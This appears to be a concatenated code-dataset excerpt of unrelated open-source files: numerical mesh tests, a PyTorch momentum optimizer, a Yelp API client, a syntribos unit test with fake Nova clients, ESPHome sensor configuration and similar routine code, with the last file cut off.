genvar w, d;
for (d = 0; d < depth; d=d+1) begin
for (w = 0; w < width; w=w+1) begin
initial int[d][w] <= ~((d+w) % 2);
if (d == 0) begin
always @(posedge clk) if (e) int[d][w] <= i[w];
end
else begin
always @(posedge clk) if (e) int[d][w] <= int[d-1][w];
end
end
end
assign q = int[l];
endgenerate
endmodule'''.format(i))
assert_dynamic_area(fp, i, 'pos_clk_with_enable_no_init_inferred2_var_len')
|
tests/boundaries/test_boundary_integrals.py
|
ngodber/discretize
| 123 |
116918
|
<gh_stars>100-1000
import numpy as np
import scipy.sparse as sp
import discretize
def u(*args):
if len(args) == 1:
x = args[0]
return x**3
if len(args) == 2:
x, y = args
return x**3 + y**2
x, y, z = args
return x**3 + y**2 + z**4
def v(*args):
if len(args) == 1:
x = args[0]
return 2*x**2
if len(args) == 2:
x, y = args
return np.c_[2*x**2, 3*y**3]
x, y, z = args
return np.c_[2*x**2, 3*y**3, -4*z**2]
def w(*args):
if len(args) == 2:
x, y = args
return np.c_[(y - 2)**2, (x + 2)**2]
x, y, z = args
return np.c_[(y-2)**2 + z**2, (x+2)**2 - (z-4)**2, y**2-x**2]
# mesh will be on [0, 1] square
# 1D
# int_V grad_u dot v dV = 6/5
# int_V u dot div v dV = 4/5
# 2D
# square vals:
# int_V grad_u dot v dV = 12/5
# int_V u div_v dV = 241/60
# int_v curl_w dot v dV = -173/30
# circle vals:
# int_V grad_u dot dV = 3*np.pi/2
# int_V u div_v dV = 13*np.pi/8
# int_v curl_w dot v dV = -43*np.pi/8
# 3D square vals:
# int_V grad_u dot v dV = -4/15
# int_V u div_v dV = 27/20
# int_v curl_w dot v dV = 17/6
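# quick check of the 1D values with u = x^3, v = 2x^2 on [0, 1]:
#   int_0^1 grad_u . v dx = int 3x^2 * 2x^2 dx = 6/5
#   int_0^1 u * div_v dx  = int x^3 * 4x dx    = 4/5
# integration by parts gives 6/5 + 4/5 = [u*v]_0^1 = 2, which is exactly the
# boundary term that the weak-form tests below account for.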
class Test1DBoundaryIntegral(discretize.tests.OrderTest):
name = "1D Boundary Integrals"
meshTypes = ["uniformTensorMesh"]
meshDimension = 1
expectedOrders = 2
meshSizes = [4, 8, 16, 32, 64, 128]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
u_cc = u(mesh.cell_centers)
v_f = v(mesh.nodes)
u_bf = u(mesh.boundary_faces)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
true_val = 6/5
if self.myTest == "edge_div":
u_n = u(mesh.nodes)
v_e = v(mesh.edges)
v_bn = v(mesh.boundary_nodes).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
true_val = 4/5
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "1D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "1D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
class Test2DBoundaryIntegral(discretize.tests.OrderTest):
name = "2D Boundary Integrals"
meshTypes = [
"uniformTensorMesh",
"uniformTree",
"uniformCurv",
"rotateCurv",
"sphereCurv"
]
meshDimension = 2
expectedOrders = [2, 2, 2, 2, 1]
meshSizes = [4, 8, 16, 32, 64, 128]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
# Functions:
u_cc = u(*mesh.cell_centers.T)
v_f = mesh.project_face_vector(v(*mesh.faces.T))
u_bf = u(*mesh.boundary_faces.T)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
if "sphere" not in self._meshType:
true_val = 12/5
else:
true_val = 3*np.pi/2
elif self.myTest == "edge_div":
u_n = u(*mesh.nodes.T)
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
v_bn = v(*mesh.boundary_nodes.T).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
if "sphere" not in self._meshType:
true_val = 241/60
else:
true_val = 13*np.pi/8
elif self.myTest == "face_curl":
w_e = mesh.project_edge_vector(w(*mesh.edges.T))
u_c = u(*mesh.cell_centers.T)
u_be = u(*mesh.boundary_edges.T)
M_c = sp.diags(mesh.cell_volumes)
Curl = mesh.edge_curl
M_be = mesh.boundary_edge_vector_integral
discrete_val = (w_e.T @ Curl.T) @ M_c @ u_c - w_e.T @ (M_be @ u_be)
if 'Curv' in self._meshType:
self._expectedOrder = -1.0
if "sphere" not in self._meshType:
true_val = -173/30
else:
true_val = -43*np.pi/8
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "2D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "2D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
def test_orderWeakFaceCurlIntegral(self):
self.name = "2D - weak face curl integral w/boundary"
self.myTest = "face_curl"
self.orderTest()
class Test3DBoundaryIntegral(discretize.tests.OrderTest):
name = "3D Boundary Integrals"
meshTypes = [
"uniformTensorMesh",
"randomTensorMesh",
"uniformTree",
"uniformCurv",
"rotateCurv",
"sphereCurv"
]
meshDimension = 3
expectedOrders = [2, 1, 2, 2, 2, 0]
meshSizes = [4, 8, 16, 32]
def getError(self):
mesh = self.M
if self.myTest == "cell_grad":
# Functions:
u_cc = u(*mesh.cell_centers.T)
v_f = mesh.project_face_vector(v(*mesh.faces.T))
u_bf = u(*mesh.boundary_faces.T)
D = mesh.face_divergence
M_c = sp.diags(mesh.cell_volumes)
M_bf = mesh.boundary_face_scalar_integral
discrete_val = -(v_f.T @ D.T) @ M_c @ u_cc + v_f.T @ (M_bf @ u_bf)
if "sphere" not in self._meshType:
true_val = -4/15
else:
true_val = 48*np.pi/35
elif self.myTest == "edge_div":
u_n = u(*mesh.nodes.T)
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
v_bn = v(*mesh.boundary_nodes.T).reshape(-1, order='F')
M_e = mesh.get_edge_inner_product()
G = mesh.nodal_gradient
M_bn = mesh.boundary_node_vector_integral
discrete_val = -(u_n.T @ G.T) @ M_e @ v_e + u_n.T @ (M_bn @ v_bn)
if "sphere" not in self._meshType:
true_val = 27/20
else:
true_val = 8*np.pi/5
elif self.myTest == "face_curl":
w_f = mesh.project_face_vector(w(*mesh.faces.T))
v_e = mesh.project_edge_vector(v(*mesh.edges.T))
w_be = w(*mesh.boundary_edges.T).reshape(-1, order='F')
M_f = mesh.get_face_inner_product()
Curl = mesh.edge_curl
M_be = mesh.boundary_edge_vector_integral
discrete_val = (v_e.T @ Curl.T) @ M_f @ w_f - v_e.T @ (M_be @ w_be)
if "sphere" not in self._meshType:
true_val = -79/6
else:
true_val = -64*np.pi/5
return np.abs(discrete_val - true_val)
def test_orderWeakCellGradIntegral(self):
self.name = "3D - weak cell gradient integral w/boundary"
self.myTest = "cell_grad"
self.orderTest()
def test_orderWeakEdgeDivIntegral(self):
self.name = "3D - weak edge divergence integral w/boundary"
self.myTest = "edge_div"
self.orderTest()
def test_orderWeakFaceCurlIntegral(self):
self.name = "3D - weak face curl integral w/boundary"
self.myTest = "face_curl"
self.orderTest()
|
labs/08_frameworks/solutions/momentum_optimizer.py
|
soufiomario/labs-Deep-learning
| 1,398 |
116986
|
import torch
class MomentumGradientDescent(GradientDescent):  # GradientDescent base class is defined earlier in this lab
def __init__(self, params, lr=0.1, momentum=.9):
super(MomentumGradientDescent, self).__init__(params, lr)
self.momentum = momentum
self.velocities = [torch.zeros_like(param, requires_grad=False)
for param in params]
def step(self):
with torch.no_grad():
for i, (param, velocity) in enumerate(zip(self.params,
self.velocities)):
velocity = self.momentum * velocity + param.grad
param -= self.lr * velocity
self.velocities[i] = velocity
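# Usage sketch (relies on the GradientDescent base class from earlier in this
# lab, which is assumed to store `params` and `lr`):
#
#   w = torch.randn(3, requires_grad=True)
#   opt = MomentumGradientDescent([w], lr=0.1, momentum=0.9)
#   loss = (w ** 2).sum()
#   loss.backward()
#   opt.step()  # in-place update: w -= lr * (momentum * velocity + w.grad)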
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/t/too/too_many_arguments_overload.py
|
ciskoinch8/vimrc
| 463 |
117003
|
<reponame>ciskoinch8/vimrc
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
from typing import overload
class ClassA:
@classmethod
@overload
def method(cls, arg1):
pass
@classmethod
@overload
def method(cls, arg1, arg2):
pass
@classmethod
def method(cls, arg1, arg2=None):
pass
ClassA.method(1, 2)
class ClassB:
@overload
def method(self, arg1):
pass
@overload
def method(self, arg1, arg2):
pass
def method(self, arg1, arg2=None):
pass
ClassB().method(1, arg2=2)
|
third_party/atlas/workspace.bzl
|
jzjonah/apollo
| 22,688 |
117017
|
<reponame>jzjonah/apollo<gh_stars>1000+
"""Loads the atlas library"""
# Sanitize a dependency so that it works correctly from code that includes
# Apollo as a submodule.
def clean_dep(dep):
return str(Label(dep))
# Installed via atlas-dev
def repo():
# atlas
native.new_local_repository(
name = "atlas",
build_file = clean_dep("//third_party/atlas:atlas.BUILD"),
path = "/usr/include", # /usr/include/$(uname -m)-linux-gnu
)
|
yelp/client.py
|
ricwillis98/yelp-python
| 195 |
117026
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import requests
import six
from yelp.config import API_ROOT_URL
from yelp.endpoint.business import BusinessEndpoints
from yelp.errors import YelpError
class Client(object):
def __init__(self, api_key):
self._session = requests.Session()
self._session.headers.update(self._get_auth_header(api_key))
# Add endpoints to this client. Then they will be accessed e.g.
# client.business.get_by_id('yelp-san-francisco')
self.business = BusinessEndpoints(self)
def _make_request(self, path, url_params=None):
url_params = url_params if url_params is not None else {}
url = "{}{}".format(
API_ROOT_URL, six.moves.urllib.parse.quote(path.encode("utf-8"))
)
response = self._session.get(url, params=url_params)
if response.status_code == 200:
return response.json()
else:
raise YelpError.from_response(response)
def _get_auth_header(self, api_key):
return {"Authorization": "Bearer {api_key}".format(api_key=api_key)}
|
tests/test_save.py
|
jinwyp/image-background-remove-tool
| 585 |
117034
|
"""
Name: tests
Description: This file contains the test code
Version: [release][3.2]
Source url: https://github.com/OPHoperHPO/image-background-remove-tool
Author: Anodev (OPHoperHPO)[https://github.com/OPHoperHPO] .
License: Apache License 2.0
License:
Copyright 2020 OPHoperHPO
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from main import __save_image_file__
import os
import shutil
import unittest
import random
from PIL import Image
def new_name():
filename = str(random.randint(0, 1202)) + ".jpg"
return filename
def save():
path = "tests/tests_temp/save_test/"
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "dir") # Dir mode
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "file") # File name empty base name
a = None
f = new_name()
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "file") # Extension Exception
except OSError:
a = True
if a:
a = False
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "dir") # Not dir error
except OSError as e:
a = True
if a:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f + '.png',
"file") # filename png test
else:
return False
else:
return False
shutil.rmtree(path)
return True
class SaveTest(unittest.TestCase):
def test_save(self):
self.assertEqual(save(), True)
if __name__ == '__main__':
unittest.main()
|
Lib/objc/_CloudPhotoLibrary.py
|
snazari/Pyto
| 701 |
117078
|
"""
Classes from the 'CloudPhotoLibrary' framework.
"""
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
CPLDateFormatter = _Class("CPLDateFormatter")
CPLPlatform = _Class("CPLPlatform")
CPLChangeBatch = _Class("CPLChangeBatch")
CPLNetworkIndicator = _Class("CPLNetworkIndicator")
CPLChangeSessionContext = _Class("CPLChangeSessionContext")
CPLExtractedBatch = _Class("CPLExtractedBatch")
CPLMomentShareParticipant = _Class("CPLMomentShareParticipant")
CPLRejectedRecords = _Class("CPLRejectedRecords")
_CPLScheduledOverride = _Class("_CPLScheduledOverride")
CPLEngineSystemMonitor = _Class("CPLEngineSystemMonitor")
_CPLForcedSyncHistory = _Class("_CPLForcedSyncHistory")
CPLEngineSyncManager = _Class("CPLEngineSyncManager")
_CPLEngineSyncLastError = _Class("_CPLEngineSyncLastError")
_CPLTransientStatus = _Class("_CPLTransientStatus")
CPLFeatureVersionHistory = _Class("CPLFeatureVersionHistory")
_CPLOptimisticIDMapping = _Class("_CPLOptimisticIDMapping")
CPLMomentShare = _Class("CPLMomentShare")
CPLBatteryMonitor = _Class("CPLBatteryMonitor")
CPLFeature = _Class("CPLFeature")
CPLMomentShareFeature = _Class("CPLMomentShareFeature")
CPLPushChangeTasks = _Class("CPLPushChangeTasks")
CPLEngineFeedbackManager = _Class("CPLEngineFeedbackManager")
CPLSyncStep = _Class("CPLSyncStep")
CPLPullFromTransportSyncStep = _Class("CPLPullFromTransportSyncStep")
CPLSimpleTaskSyncStep = _Class("CPLSimpleTaskSyncStep")
CPLPushToTransportSyncStep = _Class("CPLPushToTransportSyncStep")
CPLEngineComponentEnumerator = _Class("CPLEngineComponentEnumerator")
CPLEngineLibrary = _Class("CPLEngineLibrary")
CPLPushSessionTracker = _Class("CPLPushSessionTracker")
CPLFileWatcher = _Class("CPLFileWatcher")
CPLSyncIndicator = _Class("CPLSyncIndicator")
CPLRecordChangeDiffTracker = _Class("CPLRecordChangeDiffTracker")
CPLContainerRelation = _Class("CPLContainerRelation")
CPLLibraryState = _Class("CPLLibraryState")
CPLLibraryInfo = _Class("CPLLibraryInfo")
CPLBatchExtractionStep = _Class("CPLBatchExtractionStep")
CPLTrashedAssetExtractionStep = _Class("CPLTrashedAssetExtractionStep")
CPLNewAssetExtractionStep = _Class("CPLNewAssetExtractionStep")
CPLDeleteAlbumExtractionStep = _Class("CPLDeleteAlbumExtractionStep")
CPLNewAlbumExtractionStep = _Class("CPLNewAlbumExtractionStep")
CPLByClassExtractionStep = _Class("CPLByClassExtractionStep")
CPLRecordStorageView = _Class("CPLRecordStorageView")
CPLClientCacheBaseView = _Class("CPLClientCacheBaseView")
CPLChangedRecordStorageView = _Class("CPLChangedRecordStorageView")
CPLChangeStorage = _Class("CPLChangeStorage")
CPLChangeBatchChangeStorage = _Class("CPLChangeBatchChangeStorage")
CPLUnacknowledgedChangeStorage = _Class("CPLUnacknowledgedChangeStorage")
CPLPushRepositoryStorage = _Class("CPLPushRepositoryStorage")
CPLDiffTracker = _Class("CPLDiffTracker")
CPLCodingPropertyEntry = _Class("CPLCodingPropertyEntry")
CPLResource = _Class("CPLResource")
CPLLibraryManager = _Class("CPLLibraryManager")
_CPLWeakLibraryManager = _Class("_CPLWeakLibraryManager")
CPLActiveDownloadQueue = _Class("CPLActiveDownloadQueue")
CPLSimpleMergeHelper = _Class("CPLSimpleMergeHelper")
CPLSimpleMerger = _Class("CPLSimpleMerger")
CPLRecordStatus = _Class("CPLRecordStatus")
CPLScopedIdentifier = _Class("CPLScopedIdentifier")
CPLShare = _Class("CPLShare")
CPLErrors = _Class("CPLErrors")
CPLConfiguration = _Class("CPLConfiguration")
CPLDerivativesFilter = _Class("CPLDerivativesFilter")
CPLEngineDerivativesCache = _Class("CPLEngineDerivativesCache")
_CPLResourcesMutableArray = _Class("_CPLResourcesMutableArray")
CPLChangeSession = _Class("CPLChangeSession")
CPLPushChangeSession = _Class("CPLPushChangeSession")
CPLPullChangeSession = _Class("CPLPullChangeSession")
CPLScopeFilter = _Class("CPLScopeFilter")
_CPLEngineScopeCache = _Class("_CPLEngineScopeCache")
CPLEngineScheduler = _Class("CPLEngineScheduler")
CPLTransaction = _Class("CPLTransaction")
CPLStatus = _Class("CPLStatus")
CPLResetReason = _Class("CPLResetReason")
CPLResetTracker = _Class("CPLResetTracker")
CPLPlaceAnnotation = _Class("CPLPlaceAnnotation")
CPLEngineScopeFlagsUpdate = _Class("CPLEngineScopeFlagsUpdate")
CPLEngineScope = _Class("CPLEngineScope")
CPLEngineTransport = _Class("CPLEngineTransport")
CPLResourceIdentity = _Class("CPLResourceIdentity")
CPLResourceIdentityImplementation = _Class("CPLResourceIdentityImplementation")
CPLShareParticipant = _Class("CPLShareParticipant")
CPLBatchExtractionStrategy = _Class("CPLBatchExtractionStrategy")
CPLChangeSessionUpdate = _Class("CPLChangeSessionUpdate")
CPLPullSessionScopesAcknowledgement = _Class("CPLPullSessionScopesAcknowledgement")
CPLPullSessionUpdate = _Class("CPLPullSessionUpdate")
CPLPushSessionUpdate = _Class("CPLPushSessionUpdate")
CPLPersonReference = _Class("CPLPersonReference")
CPLRecordChange = _Class("CPLRecordChange")
CPLFaceCropChange = _Class("CPLFaceCropChange")
CPLPersonChange = _Class("CPLPersonChange")
CPLContainerRelationChange = _Class("CPLContainerRelationChange")
CPLContainerChange = _Class("CPLContainerChange")
CPLAlbumChange = _Class("CPLAlbumChange")
CPLMemoryChange = _Class("CPLMemoryChange")
CPLScopeChange = _Class("CPLScopeChange")
CPLMomentShareScopeChange = _Class("CPLMomentShareScopeChange")
CPLItemChange = _Class("CPLItemChange")
CPLAssetChange = _Class("CPLAssetChange")
CPLMasterChange = _Class("CPLMasterChange")
CPLSuggestionChange = _Class("CPLSuggestionChange")
CPLFileStorageItem = _Class("CPLFileStorageItem")
CPLEngineFileStorage = _Class("CPLEngineFileStorage")
CPLNetworkState = _Class("CPLNetworkState")
CPLNetworkWatcher = _Class("CPLNetworkWatcher")
CPLSyncSession = _Class("CPLSyncSession")
CPLPowerAssertion = _Class("CPLPowerAssertion")
_CPLTimingStatistic = _Class("_CPLTimingStatistic")
CPLEngineWriteTransactionBlocker = _Class("CPLEngineWriteTransactionBlocker")
_CPLEngineStoreBatchedTransaction = _Class("_CPLEngineStoreBatchedTransaction")
CPLEngineStoreTransaction = _Class("CPLEngineStoreTransaction")
CPLEngineStore = _Class("CPLEngineStore")
CPLEngineSyncTask = _Class("CPLEngineSyncTask")
CPLBackgroundDownloadsTask = _Class("CPLBackgroundDownloadsTask")
CPLCleanupTask = _Class("CPLCleanupTask")
CPLMinglePulledChangesTask = _Class("CPLMinglePulledChangesTask")
CPLPullScopesTask = _Class("CPLPullScopesTask")
CPLEngineScopedTask = _Class("CPLEngineScopedTask")
CPLPullFromTransportScopeTask = _Class("CPLPullFromTransportScopeTask")
CPLScopeUpdateScopeTask = _Class("CPLScopeUpdateScopeTask")
CPLPushToTransportScopeTask = _Class("CPLPushToTransportScopeTask")
CPLTransportUpdateScopeTask = _Class("CPLTransportUpdateScopeTask")
CPLEngineMultiscopeSyncTask = _Class("CPLEngineMultiscopeSyncTask")
CPLPullFromTransportTask = _Class("CPLPullFromTransportTask")
CPLScopeUpdateTask = _Class("CPLScopeUpdateTask")
CPLPushToTransportTask = _Class("CPLPushToTransportTask")
CPLTransportUpdateTask = _Class("CPLTransportUpdateTask")
_CPLPruneRequestCounter = _Class("_CPLPruneRequestCounter")
CPLEngineStorage = _Class("CPLEngineStorage")
CPLEngineInitialQueryTracker = _Class("CPLEngineInitialQueryTracker")
CPLEngineOutgoingResources = _Class("CPLEngineOutgoingResources")
CPLEngineQuarantinedRecords = _Class("CPLEngineQuarantinedRecords")
CPLEngineStatusCenter = _Class("CPLEngineStatusCenter")
CPLEngineCloudCache = _Class("CPLEngineCloudCache")
CPLEngineRemappedDeletes = _Class("CPLEngineRemappedDeletes")
CPLEngineTransientRepository = _Class("CPLEngineTransientRepository")
CPLEngineChangePipe = _Class("CPLEngineChangePipe")
CPLEngineScopeCleanupTasks = _Class("CPLEngineScopeCleanupTasks")
CPLEngineScopeStorage = _Class("CPLEngineScopeStorage")
CPLEngineResourceDownloadQueue = _Class("CPLEngineResourceDownloadQueue")
CPLEngineIDMapping = _Class("CPLEngineIDMapping")
CPLEnginePushRepository = _Class("CPLEnginePushRepository")
CPLEngineResourceStorage = _Class("CPLEngineResourceStorage")
CPLRecordView = _Class("CPLRecordView")
CPLClientCacheRecordView = _Class("CPLClientCacheRecordView")
CPLChangedRecordView = _Class("CPLChangedRecordView")
CPLSimpleRecordView = _Class("CPLSimpleRecordView")
CPLSerializedFeedbackMessage = _Class("CPLSerializedFeedbackMessage")
CPLFeedbackMessage = _Class("CPLFeedbackMessage")
CPLInfoFeedbackMessage = _Class("CPLInfoFeedbackMessage")
CPLResetFeedbackMessage = _Class("CPLResetFeedbackMessage")
CPLQuarantineFeedbackMessage = _Class("CPLQuarantineFeedbackMessage")
CPLSettingFeedbackMessage = _Class("CPLSettingFeedbackMessage")
CPLExpungeableResourceState = _Class("CPLExpungeableResourceState")
CPLAdjustments = _Class("CPLAdjustments")
CPLResourceTransferTask = _Class("CPLResourceTransferTask")
CPLEngineResourceUploadTask = _Class("CPLEngineResourceUploadTask")
CPLInMemoryResourceDownloadTask = _Class("CPLInMemoryResourceDownloadTask")
CPLEngineResourceDownloadTask = _Class("CPLEngineResourceDownloadTask")
CPLProxyResourceTransferTask = _Class("CPLProxyResourceTransferTask")
CPLForceSyncTask = _Class("CPLForceSyncTask")
CPLEngineForceSyncTask = _Class("CPLEngineForceSyncTask")
CPLEngineBackupSyncTask = _Class("CPLEngineBackupSyncTask")
CPLProxyForceSyncTask = _Class("CPLProxyForceSyncTask")
CPLProxyLibraryManagerSyncOutstandingInvocation = _Class(
"CPLProxyLibraryManagerSyncOutstandingInvocation"
)
CPLProxyLibraryManagerOutstandingInvocation = _Class(
"CPLProxyLibraryManagerOutstandingInvocation"
)
CPLPlatformObject = _Class("CPLPlatformObject")
CPLProxySession = _Class("CPLProxySession")
CPLProxyPushSession = _Class("CPLProxyPushSession")
CPLProxyPullSession = _Class("CPLProxyPullSession")
CPLProxyLibraryManager = _Class("CPLProxyLibraryManager")
CPLSuggestionAssetList = _Class("CPLSuggestionAssetList")
CPLServerFeedbackMessage = _Class("CPLServerFeedbackMessage")
CPLMemoryAssetList = _Class("CPLMemoryAssetList")
CPLRampingResponse = _Class("CPLRampingResponse")
CPLServerFeedbackResponse = _Class("CPLServerFeedbackResponse")
CPLMemoryAssetFlag = _Class("CPLMemoryAssetFlag")
CPLSuggestionAsset = _Class("CPLSuggestionAsset")
CPLSuggestionAssetFlag = _Class("CPLSuggestionAssetFlag")
CPLFaceInstance = _Class("CPLFaceInstance")
CPLRampingRequestResource = _Class("CPLRampingRequestResource")
CPLAccountFlags = _Class("CPLAccountFlags")
CPLServerFeedbackKeyAndValue = _Class("CPLServerFeedbackKeyAndValue")
CPLMemoryAsset = _Class("CPLMemoryAsset")
CPLMomentSharePreviewData = _Class("CPLMomentSharePreviewData")
CPLFaceAnalysis = _Class("CPLFaceAnalysis")
CPLFaceAnalysisReference = _Class("CPLFaceAnalysisReference")
CPLRampingResponseResource = _Class("CPLRampingResponseResource")
CPLServerFeedbackRequest = _Class("CPLServerFeedbackRequest")
CPLRampingRequest = _Class("CPLRampingRequest")
CPLArchiver = _Class("CPLArchiver")
CPLAssetKeywordSortDescriptor = _Class("CPLAssetKeywordSortDescriptor")
|
interview-preparation-kit/minimum-time-required.py
|
gajubadge11/HackerRank-1
| 340 |
117103
|
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
def calculate_days(day, cnt):
res = 0
for el in cnt.items():
res += el[1] * (day // el[0])
return res
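# Worked example for calculate_days: with machines = [2, 3] (one item every
# 2 days and one every 3), cnt = Counter({2: 1, 3: 1}) and
# calculate_days(6, cnt) == 6 // 2 + 6 // 3 == 3 + 2 == 5 items by day 6,
# while calculate_days(5, cnt) == 2 + 1 == 3.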
# Complete the minTime function below.
def minTime(machines, goal):
cnt = Counter(machines)
day_limit = 10**13
curgoal = 0
curday = 0
res = 0
prev_big = day_limit
prev_low = 0
curday = day_limit // 2
while True:
# detect if we are bouncing around in a loop
if curday == prev_big or curday == prev_low:
#print("curday = {} prev_low = {} prev_big = {}".format(curday, prev_low, prev_big))
prev_low_res = calculate_days(prev_low, cnt)
prev_big_res = calculate_days(prev_big, cnt)
if prev_low_res >= goal:
return prev_low
else:
return prev_big
curgoal = calculate_days(curday, cnt)
if curgoal < goal:
prev_low = curday
#print("micro curday = {} curgoal = {} < {}, diff = {}".format(curday, curgoal, goal, abs(curgoal - goal)))
curday = curday + (1 + day_limit - curday)//2
res = curday
else:
#print("micro curday = {} curgoal = {} > {}, diff = {}".format(curday, curgoal, goal, abs(curgoal - goal)))
prev_big = curday
day_limit = curday
curday = curday // 2
res = curday
return res
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nGoal = input().split()
n = int(nGoal[0])
goal = int(nGoal[1])
machines = list(map(int, input().rstrip().split()))
ans = minTime(machines, goal)
fptr.write(str(ans) + '\n')
fptr.close()
|
tests/unit/test_nova_client.py
|
abdullahzamanbabar/syntribos
| 277 |
117152
|
# Copyright 2016 Intel
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import testtools
from syntribos.extensions.nova import client
from syntribos.utils.config_fixture import ConfFixture
class Content(object):
id = 1234
class _Fakeserver(object):
"""Fake nova client object."""
def create(*args, **kwargs):
return Content()
def list(data):
return []
class _FakeHypervisor(object):
def list(data):
return [Content()]
class _FakeAggregates(object):
def create(*args, **kwargs):
return Content()
def list(data):
return []
class _FakeStorage(object):
"""Fake storage client."""
servers = _Fakeserver() # noqa
hypervisors = _FakeHypervisor() # noqa
aggregates = _FakeAggregates() # noqa
def fake_get_client():
return _FakeStorage()
class TestNovaClientCreateResources(testtools.TestCase):
"""Tests all getter methods for nova extension client."""
@mock.patch(
"syntribos.extensions.nova.client._get_client",
side_effect=fake_get_client)
def test_get_hypervisor_id(self, get_client_fn):
self.useFixture(ConfFixture())
self.assertEqual(1234, client.get_hypervisor_id())
@mock.patch(
"syntribos.extensions.nova.client._get_client",
side_effect=fake_get_client)
def test_get_aggregate_id(self, get_client_fn):
self.useFixture(ConfFixture())
self.assertEqual(1234, client.get_aggregate_id())
|
esphome/components/zyaura/sensor.py
|
OttoWinter/esphomeyaml
| 249 |
117170
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_CLOCK_PIN,
CONF_DATA_PIN,
CONF_CO2,
CONF_TEMPERATURE,
CONF_HUMIDITY,
DEVICE_CLASS_CARBON_DIOXIDE,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
STATE_CLASS_MEASUREMENT,
UNIT_PARTS_PER_MILLION,
UNIT_CELSIUS,
UNIT_PERCENT,
ICON_MOLECULE_CO2,
)
from esphome.cpp_helpers import gpio_pin_expression
zyaura_ns = cg.esphome_ns.namespace("zyaura")
ZyAuraSensor = zyaura_ns.class_("ZyAuraSensor", cg.PollingComponent)
CONFIG_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.declare_id(ZyAuraSensor),
cv.Required(CONF_CLOCK_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Required(CONF_DATA_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Optional(CONF_CO2): sensor.sensor_schema(
unit_of_measurement=UNIT_PARTS_PER_MILLION,
icon=ICON_MOLECULE_CO2,
accuracy_decimals=0,
device_class=DEVICE_CLASS_CARBON_DIOXIDE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_TEMPERATURE): sensor.sensor_schema(
unit_of_measurement=UNIT_CELSIUS,
accuracy_decimals=1,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_HUMIDITY): sensor.sensor_schema(
unit_of_measurement=UNIT_PERCENT,
accuracy_decimals=1,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
}
).extend(cv.polling_component_schema("60s"))
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
pin_clock = await gpio_pin_expression(config[CONF_CLOCK_PIN])
cg.add(var.set_pin_clock(pin_clock))
pin_data = await gpio_pin_expression(config[CONF_DATA_PIN])
cg.add(var.set_pin_data(pin_data))
if CONF_CO2 in config:
sens = await sensor.new_sensor(config[CONF_CO2])
cg.add(var.set_co2_sensor(sens))
if CONF_TEMPERATURE in config:
sens = await sensor.new_sensor(config[CONF_TEMPERATURE])
cg.add(var.set_temperature_sensor(sens))
if CONF_HUMIDITY in config:
sens = await sensor.new_sensor(config[CONF_HUMIDITY])
